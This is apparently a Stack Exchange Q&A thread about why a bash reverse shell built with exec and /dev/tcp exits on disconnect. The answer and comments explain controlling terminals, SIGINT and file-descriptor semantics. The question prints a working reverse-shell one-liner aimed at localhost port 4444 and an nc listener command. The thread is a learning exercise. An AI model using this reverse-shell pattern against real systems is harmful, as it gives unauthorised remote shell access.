# Redirecting all primary file descriptors using `exec` causes the shell to exit after program exists depending on which end closes the connection?

Tags: bash, shell, io-redirection, interrupt, nc

I've been practicing my `Bash` skills by creating reverse shells using  various redirection operators.

After having set up a `nc` listener:

`nc -lvp 4444`

I run the following command:

`0<&116-; exec 116<>/dev/tcp/127.0.0.1/4444 >&116 <&116 2>&116; /bin/sh`

What I can't explain is why the `/bin/sh` shell exits after the connection disconnects, but only if the `nc` shell disconnects the connection by pressing `^C`? If the `/bin/sh` shell disconnects the connection, then entering `^C` in the `/bin/sh` shell results in a newline in the `nc` shell?

Answer (score 1, accepted):

> ```
> 0<&116-;
> ```

No idea what this is supposed to achieve, other than trigger an error (unless the fd 116 is already open, in which case it won't do anything notable, either).

Confuse the reader?

> ```
> exec 116<>/dev/tcp/127.0.0.1/4444 >&116 <&116 2>&116; /bin/sh
> ```

Even if you redirected the stdin, stdout and stderr of the current shell through the socket to the listening `nc`, the current terminal is still the *controlling terminal* of the shell.

A ^C in the current terminal will send a `SIGINT` to the foreground job, which (if not waiting for another command) is the shell itself, which being *interactive*, will catch the `SIGINT` and reprint its prompt upon catching it.

A ^C in the other terminal (where `nc -l ..` is running, and where the shell is getting its input from and is printing its output to) will kill the `nc` and close all its connections, causing the shell to exit because of `EOF` on its stdin.

Again, it's unclear what the extra `/bin/sh` is supposed to achieve. It will exit immediately because of `EOF` on the stdin or `SIGPIPE`/`EPIPE` on the stdout it has inherited from its parent (the broken connection to `nc`).

Comment: Thanks Mosvy - that make sense. But why isn't `0<&116-` useful? It will close the file descriptor if already used. Without this, the reverse shell would fail? Secondly, why can a `^C` be sent to the foreground job, if other key presses won't (like `abc`)? Is it because we should distinguish ordinary key presses from signals? Does the shell ignore `abc` (where do it send those characters?), and only react on the `^C`, which causes it to sent a SIGINT signal to the foreground job?

Comment: **a)**. The `0<&116-` will not close the fd. Try it! `bash -c 'exec 116</etc/passwd; 0<&116-; cat <&116'` It will have no effect on the reverse shell **b**) Because that's how the terminal driver (part of the kernel) works. Yes, it distinguishes special from ordinary keys. Look for `isig`, `intr`, `quit`, etc in the `stty(1)` manpage **c**) The shell receives what the kernel sends it. The ordinary keys you're entering on the terminal where the shell was running will be simply queued until the tty's buffer is filled, after which they will no longer accepted and no longer echoed back.

Comment: But according to `man bash`: `[n]<&digit- : moves the file descriptor digit to file descriptor n, or the standard input (file descriptor 0) if n is not specified. digit is closed after being duplicated to n.` That means `116` will indeed be closed? What have I misunderstood from the man page?

Comment: It will move the fd only for the duration of the (empty) current command. Just like typing `</etc/passwd` + Enter at your prompt will not redirect the stdin of the shell from `/etc/passwd`.

Comment: Ahh, that make sense! Although, since `116` will be closed for the duration of that current  (empty) command, I guess most people don't assume that Bash will reopen it aftwards?. Last question, `...will be simply queued until the tty's buffer is filled, after which they will no longer accepted and no longer echoed back.` - so the terminal queues all ordinary key presses, because it sees that it cannot deliver them on the shell's normal stdin (which is not associated with the keyboard anymore)?

Comment: It just queues them until somebody bothers to read them. Your shell can at any time do an `exec </dev/tty >/dev/tty 2>&1` to redirect its std fds from the original terminal and read them.

Comment: can you think of an example, where I could see `exec </dev/tty >/dev/tty 2>&1` in action? If I do, `exec <file.txt`, I would get EOF and the shell will exit. I could of course do `exec >file.txt` and then later do `exec >/dev/tty`, but that doesn't demonstrate stdin.

Comment: You can use it in **your** example. After your `exec 116<> ...`, switch to the terminal where the nc is running, and enter `exec </dev/tty >/dev/tty 2>&1` (or `exec <>/dev/tty 1>&0 2>&0`). Then switch back to the terminal where you first entered the `exec 116<>...`, and continue to use the shell as if weren't ever redirected away. I don't get why you assume the `exec <file.txt` should work similar to `exec </dev/tty`, and what "demonstrate stdin" should mean.